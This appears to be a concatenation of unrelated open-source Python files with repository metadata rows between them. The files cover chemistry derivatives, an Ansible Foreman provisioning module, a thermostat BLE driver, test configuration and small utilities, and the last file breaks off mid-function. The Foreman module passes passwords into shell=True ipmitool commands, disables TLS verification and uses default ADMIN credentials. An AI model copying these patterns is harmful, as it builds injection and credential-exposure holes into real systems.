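#     mf = scf.RHF(mol).run()
#     der1, der2, der3 = alch_deriv(mf, dL=[[0], [1]])  # perturb atom 0 by +1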
def make_dP(mf,mo1):
mol=mf.mol
nao=mol.nao
nocc=mf.mol.nelec[0]
C=mf.mo_coeff
dP=np.zeros_like(C)
dP[:,:]=2*np.einsum('ij,jk,lk->il',C,mo1,C[:,:nocc])
return dP+dP.T
def make_U(mo1):
U=np.zeros((mo1.shape[0],mo1.shape[0]))
U[:,:mo1.shape[1]]=mo1
U=U-U.T
return U
def alch_hessian(mf,int_r,mo1):
mo_coeff=mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
h1 = lib.einsum('xpq,pi,qj->xij', int_r, mo_coeff.conj(), orbo)
e2 = np.einsum('xpi,ypi->xy', h1, mo1)
e2 = (e2 + e2.T) * 2
return e2
def cubic_alch_hessian(mf,int_r,mo1,e1):
mo_coeff = mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
mo1 = lib.einsum('xqi,pq->xpi', mo1, mo_coeff) #dC=UC
dm1 = lib.einsum('xpi,qi->xpq', mo1, orbo) * 2
dm1 = dm1 + dm1.transpose(0,2,1) #dP= dCOC^T+COdC'T
vresp = mf.gen_response(hermi=1)
h1ao = int_r + vresp(dm1) # dF=dV+G(dP)
# *2 for double occupancy
e3 = lib.einsum('xpq,ypi,zqi->xyz', h1ao, mo1, mo1) * 2 # trace( dC^T dF dC)
e3 -= lib.einsum('pq,xpi,yqj,zij->xyz', mf.get_ovlp(), mo1, mo1, e1) * 2 # - dC^T S dC de
e3 = (e3 + e3.transpose(1,2,0) + e3.transpose(2,0,1) +
e3.transpose(0,2,1) + e3.transpose(1,0,2) + e3.transpose(2,1,0))
return e3 | 33.798611 | 118 | 0.599959 |
6c0c27d12326a65df9bb7031122608a622ac7eb0 | 15,805 | py | Python | plugins/foreman/library/foreman_provisioner.py | fcharlier/infrared | 55f9e2651c0f5cfe45d0af7e4cf78ad46765f269 | [
"Apache-2.0"
] | null | null | null | plugins/foreman/library/foreman_provisioner.py | fcharlier/infrared | 55f9e2651c0f5cfe45d0af7e4cf78ad46765f269 | [
"Apache-2.0"
] | null | null | null | plugins/foreman/library/foreman_provisioner.py | fcharlier/infrared | 55f9e2651c0f5cfe45d0af7e4cf78ad46765f269 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2015, Tal Kammer <tkammer@redhat.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import requests
import os
try:
import urlparse
except ImportError:
from urllib import parse as urlparse
DOCUMENTATION = '''
---
module: foreman_provisioner
version_added: "0.1"
short_description: Provision servers via Foreman
description:
- Provision servers via Foreman
options:
username:
description:
- login username to authenticate to Foreman
required: true
default: admin
password:
description:
- Password of login user
required: true
auth_url:
description:
- The Foreman api url
required: true
host_id:
description:
- Name or ID of the host as listed in foreman
required: true
rebuild:
description:
- Should we rebuilt the requested host
default: true
required: false
mgmt_strategy:
description:
- Whether to use Foreman or system ipmi command.
default: 'foreman'
required: false
mgmt_action:
description:
- Which command to send with the power-management selected by
mgmt_strategy. For example: reset, reboot, cycle
default: 'cycle'
required: false
ipmi_address:
description:
- Host IPMI address
default: None
required: false
ipmi_username:
description:
- Host IPMI username
default: 'ADMIN'
required: false
ipmi_password:
description:
- Host IPMI password
default: 'ADMIN'
required: false
wait_for_host:
description:
      - Number of seconds to wait between polls for the host to finish rebuilding (used when 'rebuild' is set).
default: 10
required: false
operatingsystem_id:
description:
- The ID of operating system to set
required: false
medium_id:
description:
- The ID of Medium to set
required: false
ping_deadline:
description:
- Timeout in seconds for 'ping' command (works with 'wait_for_host')
default: 600
required: false
'''
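# Illustrative EXAMPLES block following the usual Ansible module convention;
# the host name, URL and credentials below are placeholders, not values taken
# from this module.
EXAMPLES = '''
- name: Rebuild a host through Foreman's BMC plugin
  foreman_provisioner:
    auth_url: https://foreman.example.com
    username: admin
    password: secret
    host_id: compute-01.example.com
    rebuild: true
    mgmt_strategy: foreman
    mgmt_action: cycle
'''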
MIN_SUPPORTED_VERSION = 2
MGMT_SUPPORTED_STRATEGIES = ['foreman', 'ipmi']
RESOURCES = {
'v2': {
'reserve': {
'url': '/api/hosts_reserve?query=name ~ {id}',
},
'release': {
'url': '/api/hosts_release?query=name ~ {id}',
},
'get': {
'url': '/api/v2/hosts/{id}',
},
'update': {
'url': '/api/v2/hosts/{id}',
},
'power': {
'url': '/api/v2/hosts/{id}/power',
},
'interfaces': {
'url': '/api/v2/hosts/{id}/interfaces',
}
}
}
class ForemanManager(object):
"""
This class represents a simple interface for foreman* to easily rebuild /
get / reserve hosts from foreman.
*Foreman: http://theforeman.org/
"""
def __init__(self, url, username, password, extra_headers=None, version=2):
"""
:param url: the url of the foreman we wish to authenticate with
:param username: the username we will use to login
:param password: the password we will use to login
:param extra_headers: if we require extra headers to be added to the
http request
:param version: the version of foreman API we wish to use (default: 2)
:type version: int
"""
if version < MIN_SUPPORTED_VERSION:
raise Exception("API version: {0} "
"is not supported at the moment".format(version))
self.session = requests.Session()
self.session.auth = (username, password)
headers = {'Accept': 'application/json',
'Content-type': 'application/json'}
if extra_headers:
headers.update(extra_headers)
self.session.headers.update(headers)
self.url = url
self.resource = RESOURCES['v2']
def compile_url(self, url, resource):
return urlparse.urljoin(url, resource)
def reserve_host(self, host_id):
"""
This method 'tags' a host as reserved in foreman
:param host_id: the name of ID of the host we wish to reserve
:returns: the host information on success, else empty body
:rtype: list of dictionaries -- [{"host": {}}]
"""
#TODO(tkammer): add the option to provide the query itself after "?"
request_url = self.compile_url(
self.url, self.resource['reserve']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
return body
def release_host(self, host_id):
"""
This method removed the 'tag' made by 'reserve_host" in foreman
:param host_id: the name or ID of the host we wish to release
:returns: the host name
:rtype: list of strings
"""
request_url = self.compile_url(
self.url, self.resource['release']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
return body
def get_host(self, host_id):
"""
This method returns the host details as listed in the foreman
:param host_id: the name or ID of the host we wish to get
:returns: host information
:rtype: dict
"""
request_url = self.compile_url(
self.url, self.resource['get']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
return body
def update_host(self, host_id, update_info):
"""
This method updates a host details in foreman
:param host_id: the name or ID of the host we wish to update
:param update_info: params we wish to update on foreman
:type update_info: dict
:returns: Request's response
:rtype: dict
"""
request_url = self.compile_url(
self.url, self.resource['update']['url'].format(id=host_id))
response = self.session.put(request_url, data=update_info, verify=False)
return response.json()
def set_build_on_host(self, host_id, flag):
"""
sets the 'build' flag of a host to a given :param flag:
:param host_id: the id or name of the host as it is listed in foreman
:param flag: a boolean value (true/false) to set the build flag with
"""
        self.update_host(host_id, json.dumps({'build': flag}))
        if self.get_host(host_id).get('build') != flag:
            raise Exception("Failed setting build on host {0}".format(host_id))
def set_host_os(self, host_id, os_id, medium_id):
"""Sets host's operating system
:param host_id: Host's FQDN/ID
:param os_id: Operating system ID to set
:param medium_id: Medium ID to set
"""
os_data = {}
if os_id:
os_data['operatingsystem_id'] = os_id
if medium_id:
os_data['medium_id'] = medium_id
# Nothing to update
if not os_data:
return
res_body = self.update_host(host_id, json.dumps({'host': os_data}))
        # Validates change (IDs are assumed to be numeric strings; int() is
        # used instead of eval() to avoid executing arbitrary input)
        if os_id and (res_body.get('operatingsystem_id') != int(os_id)):
            raise Exception(
                "Failed to set 'operatingsystem_id' - Expected '{}' but got '"
                "{}'.".format(int(os_id), res_body.get('operatingsystem_id')))
        if medium_id and (res_body.get('medium_id') != int(medium_id)):
            raise Exception(
                "Failed to set 'medium_id' - Expected '{}' but got '{}'."
                "".format(int(medium_id), res_body.get('medium_id')))
def bmc(self, host_id, command):
"""
execute a command through the BMC plugin (on/off/restart/shutdown/etc)
:param host_id: the id or name of the host as it is listed in foreman
:param command: the command to send through the BMC plugin, supported
commands: 'status', 'on', 'off', 'cycle', 'reset', 'soft'
"""
request_url = self.compile_url(
self.url, self.resource['power']['url'].format(id=host_id))
command = json.dumps({'power_action': command})
response = self.session.put(request_url, data=command, verify=False)
#TODO(tkammer): add verification that the BMC command was issued
def ipmi(self, host_id, command, username, password):
"""
execute a command through the ipmitool
:param host_id: the ipmi id of the host
:param command: the command to send through the ipmitool
:param username: host IPMI username
:param password: host IPMI password
commands: 'status', 'on', 'off', 'cycle', 'reset', 'soft' # TBD
"""
command = "ipmitool -I lanplus -H {host_id} -U {username} -P " \
"{password} chassis power {cmd}".format(
host_id=host_id, username=username, password=password, cmd=command)
return_code = subprocess.call(command, shell=True)
if return_code:
raise Exception("Call to {0}, returned with {1}".format(command, return_code))
def _validate_bmc(self, host_id):
"""
This method validate that there is at least one BMC on the given host
:param host_id: the id or name of the host as it is listed in foreman
"""
request_url = self.compile_url(
self.url, self.resource['interfaces']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
missing_bmc = True
for interface in body['results']:
if "BMC" in interface['type'].upper():
missing_bmc = False
break
return missing_bmc
def provision(self, host_id, mgmt_strategy, mgmt_action, ipmi_address,
ipmi_username, ipmi_password, operatingsystem_id, medium_id,
ping_deadline, wait_for_host=10):
"""
This method rebuilds a machine, doing so by running get_host and bmc.
:param host_id: the name or ID of the host we wish to rebuild
:param mgmt_strategy: the way we wish to reboot the machine
(i.e: foreman, ipmi, etc)
:param mgmt_action: the action we wish to use with the strategy
(e.g: cycle, reset, etc)
:param wait_for_host: number of seconds the function waits after host
finished rebuilding before checking connectivity
:param ipmi_address: remote server address (IPMI)
:param ipmi_username: remote server username (IPMI)
:param ipmi_password: remote server password (IPMI)
:param operatingsystem_id: Operating system ID
:param medium_id: Medium ID
:param ping_deadline: Timeout in seconds for 'ping' command
(works with 'wait_for_host')
:raises: KeyError if BMC hasn't been found on the given host
Exception in case of machine could not be reached after
rebuild
"""
wait_for_host = int(wait_for_host)
building_host = self.get_host(host_id)
self.set_host_os(host_id, operatingsystem_id, medium_id)
self.set_build_on_host(host_id, True)
if mgmt_strategy == 'foreman':
if self._validate_bmc(host_id):
raise KeyError("BMC not found on {}".format(host_id))
self.bmc(host_id, mgmt_action)
elif mgmt_strategy == 'ipmi':
if ipmi_address:
host_ipmi = ipmi_address
elif 'interfaces' in building_host and len(building_host.get('interfaces')) > 0:
# host found in foreman entry
host_ipmi = building_host.get('interfaces')[0].get('name')
else:
# Host isn't specified nor found in foreman
raise Exception("Unknown IPMI address for foreman host: {0}. "
"".format(host_id))
self.ipmi(host_ipmi, mgmt_action, ipmi_username, ipmi_password)
else:
raise Exception("{0} is not a supported "
"management strategy".format(mgmt_strategy))
if wait_for_host:
while self.get_host(host_id).get('build'):
time.sleep(wait_for_host)
command = "ping -q -c 30 -w {0} {1}".format(
ping_deadline, building_host.get('name'))
return_code = subprocess.call(command, shell=True)
if return_code:
raise Exception("Could not reach {0}, rc={1}, cmd={2}".format(host_id, return_code, command))
def main():
module = AnsibleModule(
argument_spec=dict(
username=dict(default='admin'),
password=dict(required=True),
auth_url=dict(required=True),
host_id=dict(required=True),
rebuild=dict(default=True, type='bool', choices=BOOLEANS),
mgmt_strategy=dict(default='foreman',
choices=MGMT_SUPPORTED_STRATEGIES),
mgmt_action=dict(default='cycle', choices=['on', 'off', 'cycle',
'reset', 'soft']),
wait_for_host=dict(default=10),
ping_deadline=dict(default=600),
ipmi_address=dict(default=None),
ipmi_username=dict(default='ADMIN'),
ipmi_password=dict(default='ADMIN'),
operatingsystem_id=dict(default=None),
medium_id=dict(default=None)))
foreman_client = ForemanManager(url=module.params['auth_url'],
username=module.params['username'],
password=module.params['password'])
status_changed = False
if module.boolean(module.params['rebuild']):
try:
foreman_client.provision(module.params['host_id'],
module.params['mgmt_strategy'],
module.params['mgmt_action'],
module.params['ipmi_address'],
module.params['ipmi_username'],
module.params['ipmi_password'],
module.params['operatingsystem_id'],
module.params['medium_id'],
module.params['ping_deadline'],
module.params['wait_for_host'])
except KeyError as e:
module.fail_json(msg=e.message)
else:
status_changed = True
#TODO(tkammer): implement RESERVE and RELEASE
host = foreman_client.get_host(module.params['host_id'])
interface = foreman_client.get_host('{0}/interfaces'.format(module.params['host_id']))
    if 'error' in host:
module.fail_json(msg=host['error'])
module.exit_json(changed=status_changed, host=host, interface=interface)
from ansible.module_utils.basic import *

if __name__ == '__main__':
    main()
| 37.541568 | 109 | 0.598671 |
805efd02113ee8ca89435994ca7c275eb4eb8662 | 700 | py | Python | mlrose_hiive/neural/activation/tanh.py | sridatta/mlrose | d9fe33df157bd801a33b13a803d737c4f8e48ebb | [
"BSD-3-Clause"
] | 63 | 2019-09-24T14:09:51.000Z | 2022-03-09T02:36:25.000Z | mlrose_hiive/neural/activation/tanh.py | kunla/mlrose | 306c96b156182a847f5c9e6ffb62eb805d266fef | [
"BSD-3-Clause"
] | 6 | 2019-10-04T01:04:21.000Z | 2021-08-31T19:06:13.000Z | mlrose_hiive/neural/activation/tanh.py | kunla/mlrose | 306c96b156182a847f5c9e6ffb62eb805d266fef | [
"BSD-3-Clause"
] | 104 | 2019-09-23T22:44:43.000Z | 2022-03-13T18:50:53.000Z | """ Neural network activation functions."""
# Author: Genevieve Hayes (Modified by Andrew Rollings)
# License: BSD 3 clause
from mlrose_hiive.decorators import short_name
import numpy as np
import warnings
warnings.filterwarnings("ignore")
@short_name('tanh')
def tanh(x, deriv=False):
"""Hyperbolic tan activation function
Parameters
----------
x: array
Array containing input data.
deriv: bool, default: False
Whether to return the function or its derivative.
Set True for derivative.
Returns
-------
fx: array
Value of activation function at x
"""
fx = np.tanh(x)
if deriv:
fx = 1 - fx**2
return fx
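# Minimal sanity check (a sketch, not part of the original module): tanh(0)
# is 0 with derivative 1, and tanh(1) is ~0.7616 with derivative ~0.4200.
if __name__ == "__main__":
    print(tanh(np.array([0.0, 1.0])))              # [0.         0.76159416]
    print(tanh(np.array([0.0, 1.0]), deriv=True))  # [1.         0.41997434]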
| 18.918919 | 57 | 0.641429 |
45bc291b5f42c8d35b844d79b58cc4a999b00914 | 65 | py | Python | notesave/cli.py | ninjamar/NoteSave | b16b06d49589ea7a6a3547fe5342d7daa92918fe | [
"MIT"
] | null | null | null | notesave/cli.py | ninjamar/NoteSave | b16b06d49589ea7a6a3547fe5342d7daa92918fe | [
"MIT"
] | null | null | null | notesave/cli.py | ninjamar/NoteSave | b16b06d49589ea7a6a3547fe5342d7daa92918fe | [
"MIT"
] | null | null | null | from . import NoteSaver
def main():
n = NoteSaver()
n.cli()
| 10.833333 | 23 | 0.615385 |
862b58d656fffe82de55c15dd031e056e4f9dd6e | 605 | py | Python | testprojects/src/python/interpreter_selection/python_3_selection_testing/lib_py2.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 1 | 2018-12-10T21:31:02.000Z | 2018-12-10T21:31:02.000Z | testprojects/src/python/interpreter_selection/python_3_selection_testing/lib_py2.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 2 | 2016-10-13T21:37:42.000Z | 2018-07-20T20:14:33.000Z | testprojects/src/python/interpreter_selection/python_3_selection_testing/lib_py2.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 1 | 2018-03-08T22:21:44.000Z | 2018-03-08T22:21:44.000Z | # coding=utf-8
# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
# A simple example to include in a python 2 binary target
def say_something():
print('I am a python 2 library method.')
# Note that ascii exists as a built-in in Python 3 and
# does not exist in Python 2.
try:
ret = ascii
except NameError:
ret = None
assert ret is None
return ret
| 28.809524 | 93 | 0.712397 |
5897da0c4844474bed09461351572178b74534bf | 234 | py | Python | setup.py | jeckt/hungry-then-sleepy | 53684d7a2f86e8c01ba1cb0a37327d5786e08785 | [
"Apache-2.0"
] | null | null | null | setup.py | jeckt/hungry-then-sleepy | 53684d7a2f86e8c01ba1cb0a37327d5786e08785 | [
"Apache-2.0"
] | null | null | null | setup.py | jeckt/hungry-then-sleepy | 53684d7a2f86e8c01ba1cb0a37327d5786e08785 | [
"Apache-2.0"
] | null | null | null | from setuptools import find_packages, setup
setup(
name='hungry-then-sleepy',
version='1.0.0',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[
'flask',
],
)
| 18 | 43 | 0.649573 |
d65fc31f0ec9bf57cbb2c9dfdb3089194fd0ae7e | 1,130 | py | Python | waldur_core/quotas/managers.py | PrintScr/waldur-core | db9f46619984d9c1e8b62f1aba89a69369ade08a | [
"MIT"
] | 23 | 2015-01-15T13:29:53.000Z | 2017-05-04T05:12:24.000Z | waldur_core/quotas/managers.py | opennode/nodeconductor | d6c17a9592bb6c49c33567542eef8d099605a46a | [
"MIT"
] | null | null | null | waldur_core/quotas/managers.py | opennode/nodeconductor | d6c17a9592bb6c49c33567542eef8d099605a46a | [
"MIT"
] | 8 | 2015-01-11T18:51:47.000Z | 2017-06-29T18:53:12.000Z | from django.contrib.contenttypes import models as ct_models
from django.db import models
from django.db.models import Q
from waldur_core.core.managers import GenericKeyMixin
class QuotaManager(GenericKeyMixin, models.Manager):
def filtered_for_user(self, user, queryset=None):
from waldur_core.quotas import utils
if queryset is None:
queryset = self.get_queryset()
        # XXX: This circular dependency will be removed when filter_queryset_for_user
        # is moved to a model manager method
from waldur_core.structure.managers import filter_queryset_for_user
if user.is_staff or user.is_support:
return queryset
quota_scope_models = utils.get_models_with_quotas()
query = Q()
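        # OR together one (content_type, object_id) constraint per model that
        # carries quotas, so a single queryset filter covers every scope type
        # the user is allowed to access.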
for model in quota_scope_models:
user_object_ids = filter_queryset_for_user(model.objects.all(), user).values_list('id', flat=True)
content_type_id = ct_models.ContentType.objects.get_for_model(model).id
query |= Q(object_id__in=user_object_ids, content_type_id=content_type_id)
return queryset.filter(query)
| 37.666667 | 110 | 0.723894 |
8e939218a5556e5a9892acdb69bdb28ea284fe13 | 545 | py | Python | adafruit-circuitpython-bundle-py-20201107/examples/circuitplayground_buttons_neopixels.py | rantler/AdaFruit | 9b0aa56ede9ac358b835162cad4c6531c09ba5b0 | [
"CC0-1.0"
] | null | null | null | adafruit-circuitpython-bundle-py-20201107/examples/circuitplayground_buttons_neopixels.py | rantler/AdaFruit | 9b0aa56ede9ac358b835162cad4c6531c09ba5b0 | [
"CC0-1.0"
] | null | null | null | adafruit-circuitpython-bundle-py-20201107/examples/circuitplayground_buttons_neopixels.py | rantler/AdaFruit | 9b0aa56ede9ac358b835162cad4c6531c09ba5b0 | [
"CC0-1.0"
] | null | null | null | """This example lights up half the NeoPixels red while button A is being pressed, and half the
NeoPixels green while button B is being pressed."""
from adafruit_circuitplayground import cp
cp.pixels.brightness = 0.3
cp.pixels.fill((0, 0, 0)) # Turn off the NeoPixels if they're on!
while True:
if cp.button_a:
cp.pixels[0:5] = [(255, 0, 0)] * 5
else:
cp.pixels[0:5] = [(0, 0, 0)] * 5
if cp.button_b:
cp.pixels[5:10] = [(0, 255, 0)] * 5
else:
cp.pixels[5:10] = [(0, 0, 0)] * 5
| 30.277778 | 95 | 0.585321 |
a1f826b46ff8438a0bc1592ec5c87ffef8063bd4 | 1,615 | py | Python | tests/conftest.py | butsyk/github3.py | 72fa5125fce75c916733839963554765c907e9e7 | [
"BSD-3-Clause"
] | 1 | 2019-04-23T07:16:07.000Z | 2019-04-23T07:16:07.000Z | tests/conftest.py | butsyk/github3.py | 72fa5125fce75c916733839963554765c907e9e7 | [
"BSD-3-Clause"
] | 4 | 2020-10-19T13:02:37.000Z | 2020-10-25T19:01:25.000Z | tests/conftest.py | butsyk/github3.py | 72fa5125fce75c916733839963554765c907e9e7 | [
"BSD-3-Clause"
] | 1 | 2020-03-06T06:30:51.000Z | 2020-03-06T06:30:51.000Z | import base64
import betamax
import os
import pytest
from betamax_matchers import json_body
credentials = [
os.environ.get("GH_USER", "foo").encode(),
os.environ.get("GH_PASSWORD", "bar").encode(),
]
betamax.Betamax.register_request_matcher(json_body.JSONBodyMatcher)
with betamax.Betamax.configure() as config:
config.cassette_library_dir = "tests/cassettes"
record_mode = os.environ.get("GH_RECORD_MODE", "once")
config.default_cassette_options["record_mode"] = record_mode
config.define_cassette_placeholder(
"<AUTH_TOKEN>", os.environ.get("GH_AUTH", "x" * 20)
)
config.default_cassette_options["match_requests_on"].append("json-body")
config.define_cassette_placeholder(
"<BASIC_AUTH>", base64.b64encode(b":".join(credentials)).decode()
)
@pytest.fixture
def betamax_simple_body(request):
"""Return configuration to match cassette on uri, method and body."""
request.cls.betamax_simple_body = {
"match_requests_on": ["uri", "method", "body"]
}
@pytest.fixture
def enterprise_url(request):
"""Configure class with enterprise url."""
request.cls.enterprise_url = "https://enterprise.github3.com"
class IfNoneMatchMatcher(betamax.BaseMatcher):
name = "if-none-match"
def match(self, request, recorded_request):
request_header = request.headers.get("If-None-Match")
recorded_header = recorded_request["headers"].get("If-None-Match")
        return request_header == recorded_header
betamax.Betamax.register_request_matcher(IfNoneMatchMatcher)
| 27.372881 | 76 | 0.719505 |
ae3e65d4f09a090c39d6a363460a2dccbd750bb1 | 4,191 | py | Python | qtoggleserver/eq3bt/eq3btthermostat.py | qtoggle/qtoggleserver-eq3bt | 593efac456d5fc69e2b5977a9403bdc19c44e07e | [
"Apache-2.0"
] | null | null | null | qtoggleserver/eq3bt/eq3btthermostat.py | qtoggle/qtoggleserver-eq3bt | 593efac456d5fc69e2b5977a9403bdc19c44e07e | [
"Apache-2.0"
] | null | null | null | qtoggleserver/eq3bt/eq3btthermostat.py | qtoggle/qtoggleserver-eq3bt | 593efac456d5fc69e2b5977a9403bdc19c44e07e | [
"Apache-2.0"
] | null | null | null |
import datetime
from typing import List, Optional, Type
from qtoggleserver.core import ports as core_ports
from qtoggleserver.lib import ble
from .exceptions import EQ3Exception
class EQ3BTThermostat(ble.BLEPeripheral):
WRITE_HANDLE = 0x0410
NOTIFY_HANDLE = 0x0420
STATUS_SEND_HEADER = 0x03
STATUS_RECV_HEADER = 0x02
STATUS_MANUAL_MASK = 0x01
STATUS_BOOST_MASK = 0x04
STATUS_LOCKED_MASK = 0x20
STATUS_BITS_INDEX = 2
STATUS_TEMP_INDEX = 5
WRITE_TEMP_HEADER = 0x41
WRITE_MANUAL_HEADER = 0x40
WRITE_BOOST_HEADER = 0x45
WRITE_LOCKED_HEADER = 0x80
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self._temp: Optional[float] = None
self._manual: Optional[bool] = False
self._boost: Optional[bool] = False
self._locked: Optional[bool] = False
async def set_temp(self, temp: float) -> None:
self.debug('setting temperature to %.1f degrees', temp)
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_TEMP_HEADER, int(temp * 2)]))
self.debug('successfully set temperature')
self._temp = temp
def get_temp(self) -> Optional[float]:
return self._temp
async def set_manual(self, manual: bool) -> None:
self.debug('%s manual mode', ['disabling', 'enabling'][manual])
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_MANUAL_HEADER, 0x40 if manual else 0x00]))
self.debug('successfully set manual mode')
self._manual = manual
def get_manual(self) -> Optional[bool]:
return self._manual
async def set_boost(self, boost: bool) -> None:
self.debug('%s boost', ['disabling', 'enabling'][boost])
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_BOOST_HEADER, int(boost)]))
self.debug('successfully set boost')
self._boost = boost
def get_boost(self) -> Optional[bool]:
return self._boost
async def set_locked(self, locked: bool) -> None:
        self.debug('%s the thermostat', ['unlocking', 'locking'][locked])
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_LOCKED_HEADER, int(locked)]))
self.debug('successfully set locked')
self._locked = locked
def get_locked(self) -> Optional[bool]:
return self._locked
async def make_port_args(self) -> List[Type[core_ports.BasePort]]:
from .ports import Temperature, Manual, Boost, Locked
return [
Temperature,
Manual,
Boost,
Locked
]
async def poll(self) -> None:
await self._read_config()
async def _read_config(self) -> None:
        # Reset all polled values so that, in case of error, old values aren't reused
        self._temp = None
        self._manual = None
        self._boost = None
        self._locked = None
data = await self.write_wait_notify(
self.WRITE_HANDLE,
self.NOTIFY_HANDLE,
bytes([self.STATUS_SEND_HEADER] + self._make_status_value()),
)
if not data:
raise EQ3Exception('Null notification data')
if len(data) < 6:
raise EQ3Exception(f'Notification data too short {self.pretty_data(data)}')
if data[0] != self.STATUS_RECV_HEADER:
raise EQ3Exception(f'Unexpected notification data header: {data[0]:02X}')
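        # Illustrative decode (the frame below is made up, not captured from a
        # real device): data = bytes([0x02, 0x01, 0x25, 0x00, 0x04, 0x2A])
        # parses to 21.0 degrees (0x2A / 2) with manual, boost and locked all
        # set, since 0x25 contains the 0x01, 0x04 and 0x20 mask bits.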
self._temp = data[self.STATUS_TEMP_INDEX] / 2.0
self._manual = bool(data[self.STATUS_BITS_INDEX] & self.STATUS_MANUAL_MASK)
self._boost = bool(data[self.STATUS_BITS_INDEX] & self.STATUS_BOOST_MASK)
self._locked = bool(data[self.STATUS_BITS_INDEX] & self.STATUS_LOCKED_MASK)
self.debug('temperature is %.1f degrees', self._temp)
self.debug('manual mode is %s', ['disabled', 'enabled'][self._manual])
self.debug('boost mode is %s', ['disabled', 'enabled'][self._boost])
self.debug('thermostat is %s', ['unlocked', 'locked'][self._locked])
@staticmethod
def _make_status_value() -> List[int]:
now = datetime.datetime.now()
return [
now.year - 2000,
now.month,
now.day,
now.hour,
now.minute,
now.second
]
| 31.276119 | 104 | 0.634693 |
8c3416273608cba7dd4a03c6f549226c153b6f3c | 13,228 | py | Python | zodo/utils.py | ZooPhy/zodo-services | b065c3967d831fae1a22a2e9c351d49437d1d02c | [
"Apache-2.0"
] | 1 | 2022-02-06T16:01:08.000Z | 2022-02-06T16:01:08.000Z | zodo/utils.py | ZooPhy/zodo-services | b065c3967d831fae1a22a2e9c351d49437d1d02c | [
"Apache-2.0"
] | 7 | 2020-09-01T19:18:29.000Z | 2022-02-10T01:45:33.000Z | zodo/utils.py | ZooPhy/zodo-services | b065c3967d831fae1a22a2e9c351d49437d1d02c | [
"Apache-2.0"
] | 1 | 2020-09-18T21:21:56.000Z | 2020-09-18T21:21:56.000Z | """Utility functions for loading datasets and computing NER performance"""
import copy
import json
import logging
import re
import shutil
import sys
import tarfile
import time
import urllib.request as request
import xml.etree.ElementTree as ET
from collections import OrderedDict
from contextlib import closing
from typing import List
from os import listdir
from os.path import join
import jsonpickle
import redis
import regex as nre
import requests
import textract
from bioc import biocjson
from requests.utils import quote
from zodo.ner.ner_utils import LOC_ANN_TAG, detect, load_ner
from zodo.settings import (EXTRACT_SUPPLEMENTAL, SUPPLEMENTAL_DATA_DIR, SUPPLEMENTAL_DATA_FILETYPES,
GEO_HOST, GEO_PORT)
CLEANUP_REGEX = r"(\s+|\-|\.|\"|\(|\)|\\|\?|\!|\/|\:|\;|\_|\+|\`|\[|\]|\#|\*|\%|\<|\>|\=)"
GB_COUNTRY_FIELD_REGEX = r"(.*):(.*)"
FTP_REGEX = r"format=\"tgz\" .* href=\"(.*)\""
MODE_STRICT = 1
MODE_EXPANDED = 2
MODE_DESPERATE = 3
GEO_STOPWORDS_RE = r'|'.join(["Southcentral", "Interior", "Northwestern", "Northeastern", "Southwestern", "Southeastern",
"Central"])
# All URLs contain 'PH' placeholders that are replaced when the query is built
GEONAMES_URL = "http://"+GEO_HOST+":"+GEO_PORT+"/location?location=LPH&count=CPH&mode=MPH"
PUBMED_URL = "https://www.ncbi.nlm.nih.gov/research/bionlp/RESTful/pubmed.cgi/BioC_json/PMPH/unicode"
PMCOA_URL = "https://www.ncbi.nlm.nih.gov/research/bionlp/RESTful/pmcoa.cgi/BioC_json/PMCOAPH/unicode"
PMC_OA_FTP_URL = "https://www.ncbi.nlm.nih.gov/pmc/utils/oa/oa.fcgi?id=IDPH"
FULL_CONFIDENCE_GEOCODES = ["CONT", "PCLI", "PCLH", "RGN", "PEN"]
class NamedEntityObj(object):
'''Named Entity object which contains offsets, location and possible locations'''
    def __init__(self, span, best_loc=None, poss_locs=None, probability=0.01):
        # placeholders (avoid a shared mutable default argument for poss_locs)
        self.span = span
        self.best_loc = best_loc
        self.poss_locs = poss_locs if poss_locs is not None else []
        self.probability = probability
def __str__(self):
return str(self.__class__) + ": " + str(self.__dict__)
def serialize(self, minimal=True):
'''returns serialized object for conversion to json'''
if minimal:
return {'span': self.span.serialize(),
'best_loc': self.best_loc,
'probability': self.probability,
}
else:
return {'span': self.span.serialize(),
'best_loc': self.best_loc,
'probability': self.probability,
'poss_locs': self.poss_locs
}
def load_static_objects(args):
'''Load all the static objects like the NER Graph'''
load_ner(args)
def extract_probability(records):
'''Extract probability based on hueristics'''
    # If the location is a country/continent/region, the first record will
    # carry one of the high-level feature codes, so there is no point in
    # keeping the other locations as possible alternatives.
# TODO: need to double check with string similarity as well
if records and records[0]["Code"] in FULL_CONFIDENCE_GEOCODES:
# logging.debug("Country/Continent/Region detected, removing alternatives: %s", records[0]["Name"])
records = records[:1]
    # For the population heuristic, derive each record's probability from the total population of the retrieved records
total_pop = sum([int(x["Population"]) for x in records if "Population" in x])
# TODO: assign probability based on string similarity as well
